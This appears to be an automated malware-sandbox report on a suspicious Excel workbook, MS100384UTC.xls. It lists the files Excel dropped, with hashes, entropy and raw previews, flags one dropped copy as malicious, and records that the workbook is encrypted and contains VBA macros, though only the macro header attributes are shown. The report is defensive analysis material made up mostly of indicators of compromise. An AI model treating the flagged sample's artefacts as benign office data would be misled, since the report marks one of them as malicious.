                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/20/2024 15:05:56.705.EXCEL (0x2190).0x2280.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2024-12-20T15:05:56.705Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T15:05:56.3309544Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T15:05:56.3309544Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T15:05:56.3309544Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1584
                    Entropy (8bit):2.6928361216532144
                    Encrypted:false
                    SSDEEP:24:YxIPuk+z7Fl3HyFOqYp2IyoeyjkFP5VQBMQRgYOCE+E7UXOKI5KazYvKISmtzGd2:YxAT+PFKUFM78BMQiYOSVIADK+GTzq
                    MD5:CE32F70E720ADCBCA3832170077678F5
                    SHA1:DBC905854C8C46BA08DFE3CB040A644C06E76F8D
                    SHA-256:DC3B4A2D32EEB0B387AD67EE71194B61AB60818C633DF870DA89F5485D26FACE
                    SHA-512:48BC3D3AF66EBA0CBA9941D3D8AA1E4360683DE7EDFB8489EACACA9052CF717136EA7CC6B9E58958B454D265C1A011865421BA818D461A15BFD17453DD14C2F0
                    Malicious:false
                    Preview:3.7.4.6.3.7.8.,.3.7.4.6.3.7.6.,.1.0.7.,.6.3.6.4.3.3.4.,.1.1.9.6.3.7.8.,.2.5.5.0.5.0.8.8.,.1.0.1.,.1.0.4.9.5.2.3.4.,.1.1.9.,.7.0.0.9.9.8.4.,.1.1.9.6.2.9.3.,.1.2.4.,.1.9.8.4.4.3.5.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.8.,.6.5.4.2.1.8.5.1.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.0.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.3.,.1.2.6.,.1.2.2.3.4.3.4.,.4.5.8.4.0.2.3.2.,.2.6.0.1.,.8.7.4.7.0.1.5.3.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.9.,.6.1.7.0.7.3.0.5.,.3.,.3.0.1.5.3.7.2.1.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.5.7.9.9.9.6.6.1.,.4.8.1.9.5.5.3.8.,.7.4.5.3.4.5.9.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.6.3.7.1.6.9.4.,.1.3.,.3.0.1.2.3.4.6.6.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.2.,.1.
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):7.471672312730222
                    Encrypted:false
                    SSDEEP:768:aU/DwTo0TJZpXXGvdfBwEhkYTEEYzIMEK7ilqjqofK:/h0tZp4tSEqzEYzIMEHl3
                    MD5:5563A74B780C7D134F198CDFFA10F2AE
                    SHA1:39E3E997CC260DAEF25D1C9948C0586615A91598
                    SHA-256:FD4ED2FB2AFC1DFC5F0823852C275983EA7D26AA3A3675B685C6242C35D75D7D
                    SHA-512:049A8056710F9A81D3D63276009E6249C7268EBDFCC76341F404824E449D0D17362675AB58333CBCA303AB158DD5A5A6CCCEF88694A95DED3D89670E2D607203
                    Malicious:false
                    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):16384
                    Entropy (8bit):6.4666351200891485
                    Encrypted:false
                    SSDEEP:192:+CPUgZlJJ9vnUufWG72ofW2snm2bBxPDmSj8+PqSx6:FMgZlJJlnUufV2oO28nfDj84x6
                    MD5:B9316D0AF915E8300A91B4ACBA4AAF9B
                    SHA1:33CF7ECEF68A603C5DA5E14C30A3B303281A0432
                    SHA-256:1ECA1C35869561FFD9BBBA14B738CA993E675FAA939B14381A93387A77E1A114
                    SHA-512:32D24158B9FD2B4DE324C2D3BE6819ABFA8A4287CB9516420148DDBF8833FBC01198B2C534F0192B6F94A0CCD5436CFE6F55E878A69AFFC9250D7F2BE4BA0060
                    Malicious:false
                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):53760
                    Entropy (8bit):7.385765624319284
                    Encrypted:false
                    SSDEEP:768:A5VIHbSIpsp3/10qfTaClc4xJNzD/1FCUpeZ8Ak5mhvMYVZAf:AkHbXpsJ2crDtkFZ8nukB
                    MD5:F5A89BC66779754CFB13A2AA811B04A8
                    SHA1:B8B82DC7417622E9DEC6C1BDEFA4E797F851D8AB
                    SHA-256:2ADD58D9AA42AFF69B088733753718701CD924BA07A7DCFF097EB757A02EFA37
                    SHA-512:60550CC977D3F78D86F0FF34B1456B7697B120F3C7D88E80E20B0AB194C08D53693514A6D3B6BD34714BC200A5734E7266D390F4A9ED731108D6A1884011862C
                    Malicious:false
                    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):229376
                    Entropy (8bit):6.394430044729381
                    Encrypted:false
                    SSDEEP:6144:9X7zwPk3hbdlylKsgwyzcTbWhZFVE+WaxHAEWhcI7PIDqZ8:9wQW+APJ
                    MD5:DC4A3849CB3F9A4F466711C4793B7CDB
                    SHA1:00299AEE0DD95AF72D0B0623B5456EA5639E3C8A
                    SHA-256:FBEBBC65B613AE9012E58753435A11CBF1E525E0F96BFBF7C432FC64A13ADFD2
                    SHA-512:DA088CD71FB159F438BC2D6C09DFCCF5F000580BAE8D7338912FF10C0B7AF3850630775A2C6858594D10E798646686EAA10D9DA68C3C76B22F9531F701A894F1
                    Malicious:false
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 15:05:53 2024, Security: 1
                    Category:dropped
                    Size (bytes):854528
                    Entropy (8bit):7.6234148495739325
                    Encrypted:false
                    SSDEEP:12288:RweW+fJEUiOIBUzMTSRD3DERnLRmF8DhEPDxpsAQx1Zj+j9EPVPJBKASDbz:R/BaQbARM8Az8Z+joVPJBK7n
                    MD5:FE530E03039EC67DC9B28B1E7BBC4851
                    SHA1:81BDB19A4C86655A40BC166249C6D3A47D865BC6
                    SHA-256:82B54ABFC12BAAF89C24A1B423E9DA29A418E5F50E25885F779A20888AE36AE1
                    SHA-512:D0B6FEEB2CF71FFFAD1404ECDF71E4601A850A3F6788DB8BB73BD612ACF3B5256CC0C035701B7E9627D1B5B8A08D77B8BA8491030548A110F64AE126A14EACD2
                    Malicious:false
                    Preview:......................>.......................................................l...m...n...o...p...............Y...Z...t...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................k.......W..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...............................r...s...t...u...v...w...x...y...z...
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:false
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 15:05:53 2024, Security: 1
                    Category:dropped
                    Size (bytes):854528
                    Entropy (8bit):7.6234148495739325
                    Encrypted:false
                    SSDEEP:12288:RweW+fJEUiOIBUzMTSRD3DERnLRmF8DhEPDxpsAQx1Zj+j9EPVPJBKASDbz:R/BaQbARM8Az8Z+joVPJBK7n
                    MD5:FE530E03039EC67DC9B28B1E7BBC4851
                    SHA1:81BDB19A4C86655A40BC166249C6D3A47D865BC6
                    SHA-256:82B54ABFC12BAAF89C24A1B423E9DA29A418E5F50E25885F779A20888AE36AE1
                    SHA-512:D0B6FEEB2CF71FFFAD1404ECDF71E4601A850A3F6788DB8BB73BD612ACF3B5256CC0C035701B7E9627D1B5B8A08D77B8BA8491030548A110F64AE126A14EACD2
                    Malicious:true
                    Preview:......................>.......................................................l...m...n...o...p...............Y...Z...t...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................k.......W..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...............................r...s...t...u...v...w...x...y...z...
                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 07:24:08 2024, Security: 1
                    Entropy (8bit):7.744269957296979
                    TrID:
                    • Microsoft Excel sheet (30009/1) 47.99%
                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                    File name:MS100384UTC.xls
                    File size:1'123'840 bytes
                    MD5:59b463677f083cb8bf771e27162ef915
                    SHA1:d97b1cdbb09e2b4b93f8de903460fade41382ff0
                    SHA256:c306daeb532d48d6f51f35c1612d9bed38e854aa80eb86f14513c06a6bee67d7
                    SHA512:c8c45e4a7f43e6ff3e60d44367ff43e24753e670dcf9e7d3ebf2d6444aff7a46c612362b0f83b3683b23098c2f67ee528541ff5d3654d56ba018fa1c018b10a6
                    SSDEEP:24576:iBajbARM8A18Z+jZ+X+VcVtsnV6+05dpd:ihU1XjZ+uaNb3
                    TLSH:763501E5738DAB52C609563575F393AE1714AC03E902423B36F8B31D1AFB6D08643F9A
                    File Content Preview:........................>.......................................................i...j...k...l...m...............V...W...r.......g.......i......................................................................................................................
                    Icon Hash:35ed8e920e8c81b5
                    Document Type:OLE
                    Number of OLE Files:1
                    Has Summary Info:
                    Application Name:Microsoft Excel
                    Encrypted Document:True
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:True
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:False
                    Flash Objects Count:0
                    Contains VBA Macros:True
                    Code Page:1252
                    Author:
                    Last Saved By:
                    Create Time:2006-09-16 00:00:00
                    Last Saved Time:2024-12-20 07:24:08
                    Creating Application:Microsoft Excel
                    Security:1
                    Document Code Page:1252
                    Thumbnail Scaling Desired:False
                    Contains Dirty Links:False
                    Shared Document:False
                    Changed Hyperlinks:False
                    Application Version:786432
                    General
                    Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                    VBA File Name:Sheet1.cls
                    Stream Size:977
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Attribute VB_Name = "Sheet1"
                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    

                    General
                    Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                    VBA File Name:Sheet2.cls
                    Stream Size:977
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Attribute VB_Name = "Sheet2"
                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    

                    General
                    Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                    VBA File Name:ThisWorkbook.cls
                    Stream Size:985
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Attribute VB_Name = "ThisWorkbook"
                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    

                    General
                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                    VBA File Name:Sheet1.cls
                    Stream Size:977
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e2 09 fd 9d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Attribute VB_Name = "Sheet1"
                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    

                    General
                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                    VBA File Name:Sheet2.cls
                    Stream Size:977
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e2 09 09 b0 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Attribute VB_Name = "Sheet2"
                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    

                    General
                    Stream Path:\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:114
                    Entropy:4.25248375192737
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:\x5DocumentSummaryInformation
                    CLSID:
                    File Type:data
                    Stream Size:244
                    Entropy:2.889430592781307
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                    General
                    Stream Path:\x5SummaryInformation
                    CLSID:
                    File Type:data
                    Stream Size:200
                    Entropy:3.260350317504982
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . \\ 7 ( R . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                    General
                    Stream Path:MBD006207A4/\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:99
                    Entropy:3.631242196770981
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A4/Package
                    CLSID:
                    File Type:Microsoft Excel 2007+
                    Stream Size:12479
                    Entropy:7.0945112382968425
                    Base64 Encoded:True
                    Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    General
                    Stream Path:MBD006207A5/\x1CompObj
                    CLSID:
                    File Type:data
                    Stream Size:99
                    Entropy:3.631242196770981
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    General
